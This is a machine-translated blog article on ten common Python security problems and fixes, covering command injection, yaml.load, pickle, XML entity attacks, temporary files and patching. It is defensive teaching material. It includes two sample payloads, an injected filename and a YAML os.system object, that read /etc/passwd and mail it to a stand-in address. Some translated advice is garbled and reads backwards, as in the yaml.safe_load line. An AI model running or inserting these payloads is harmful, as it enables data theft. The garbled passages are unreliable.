Shulou(Shulou.com)06/01 Report--

This article mainly explains "what are the common security problems in Python and how to fix them". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let Xiaobian take you to learn "What are the common security problems in Python and how to fix them"!

I. Input injection

Injection attacks are widespread and common, and there are many types of injections that affect all languages, frameworks, and environments.

SQL injection is mixing string literals with variables when writing SQL queries directly (rather than using ORM).

Command injection may occur when a process is invoked using popen, subprocess, os.system and parameters are taken from variables, and when native commands are invoked, someone may set certain values to malicious values.

Here's a simple script that invokes a child process with a user-supplied filename:

import subprocessdef transcode_file(request, filename): command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename) subprocess.call(command, shell=True) # a bad idea!

An attacker could set filename to "; cat / etc / passwd| mail them@domain.com or something equally dangerous.

Fix:

If you use a Web framework, you can use the included utilities to clean up your input, and don't manually build SQL queries unless there's a good reason to do so. Most ORMs have built-in sanitization methods.

For shells, you can escape input correctly using the shlex module.

Assert statements (Assert statements)

Do not use assert statements to prevent users from accessing code snippets they should not access.

def foo(request, user): assert user.is_admin, "user does not have access" # secure code...

Python now executes scripts with__debug__true by default, but in a production environment, optimization runs are usually used, which skips the assert statement and goes directly to security code, regardless of whether the user is_admin.

Fix:

Use assert statements only when communicating with other developers, such as in unit tests or to prevent incorrect API usage.

3. Timing attacks

A timed attack is essentially a way to expose behavior and algorithms by timing comparisons of the time it takes to provide values. Timing attacks require precision, so they generally cannot be used on high-latency remote networks. Since most Web applications involve variable latency, it is almost impossible to write timed attacks on HTTP Web servers.

However, if you have a command-line application that prompts for a password, an attacker can write a simple script to calculate the time it takes to compare its value to the actual password.

Fix:

Use secrets.compare_digest, introduced in Python 3.5, to compare passwords with other privacy values.

Temporary files (Temporary files)

To create temporary files in Python, you typically use the mktemp() function to generate a file name and then create a file with that name. This is unsafe because another process may create a file with the same name in the gap between calling mktemp() and then trying to create a file through the first process. This means that the application may load incorrect data or expose other temporary data.

If you call an incorrect method, the latest version of Python throws a run warning.

Fix:

If you need to generate temporary files, use the tempfile module and use mkstemp.

5. Use yaml.load

Reference PyYAML documentation:

Warning: It is unsafe to call yaml.load with data received from an untrusted source! yaml.load is just as powerful as pickle.load, so you can call any Python function.

In this example from the popular Python project Ansible, you can supply this value as (valid) YAML to Ansible Vault, which calls os.system() with parameters supplied in the file.

!! python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

So effectively loading YAML files from user-supplied values opens the app to attacks.

Fix:

Always don't prioritize yaml.safe_load unless you have a very good reason.

Parsing XML

If your application loads and parses XML files, you are probably using XML standard library modules. Attacks via XML are mostly DoS style (designed to crash systems rather than leak data) and are common, especially when parsing external (i.e., untrusted) XML files.

There are "billion laughs" because their payloads usually contain a lot of "lols." Basically, the principle is that reference entities can be used in XML, so when the parser loads the XML file into memory, it consumes a few G's of RAM.

]>&lol9;

Other attacks use external entity extensions. XML supports referencing entities from external URLs, and XML parsers usually fetch and load that resource without question. Attackers can circumvent firewalls and access restricted resources because all requests are created by trusted IP addresses on the inside, not from the outside.

Another situation to consider is dependent third-party packages that need to decode XML, such as configuration files, remote APIs. You may not even know that a dependency will ignore these types of attacks.

Fix:

Replace standard library modules with defusedxml, which adds security against these types of attacks.

Contaminated site-packages or import paths

Python's import system is very flexible, which is great when you want to write patches for tests or overload core functionality.

But this is one of the biggest security holes in Python.

Installing third-party packages, either in a virtual environment or globally (which is generally discouraged), will expose you to security vulnerabilities in those packages. There are packages released to PyPi that have similar names to popular packages, but execute arbitrary code.

Another situation to consider is dependencies, which may contain vulnerabilities and which can override default behavior in Python by importing systems.

Fix:

Take a look at http://PyUp.io and its security services, use virtual environments for all applications, and make sure global site-packages are as clean as possible, checking package signatures.

8. Serializing Pickles

deserializing pickle data is just as bad as YAML. Python classes can declare a__reduce__method that returns a string, or a callable tuple, and parameters called when serialized using pickle. An attacker could use it to include a reference to one of the child process modules to run arbitrary commands on the host.

Fix:

Never use pickle to deserialize data from untrusted or unauthenticated sources. Change to another serialization schema, such as JSON.

9. Use the system Python runtime and don't fix it

Most POSIX systems come with a Python 2 version (usually an older version).

Sometimes Python (i.e. CPython is written in C) interpreter itself has vulnerabilities, common security issues in C are related to memory allocation, so mostly buffer overflow errors, CPython has had some overflow vulnerabilities for many years, and each vulnerability has been fixed in subsequent versions. In other words, if Python runtime is upgraded in time, it is safe.

Fix:

Install the latest version of Python for production applications and install fix updates in a timely manner!

X. Not repairing dependencies

Similar to not patching Python runtime, dependencies also need to be patched periodically.

Fix:

Use services like PyUp.io to check for updates, propose pr to apps, and run tests to keep packages up to date.

At this point, I believe that everyone has a deeper understanding of "what are the common security problems in Python and how to fix them". Let's actually operate them! Here is the website, more related content can enter the relevant channels for inquiry, pay attention to us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.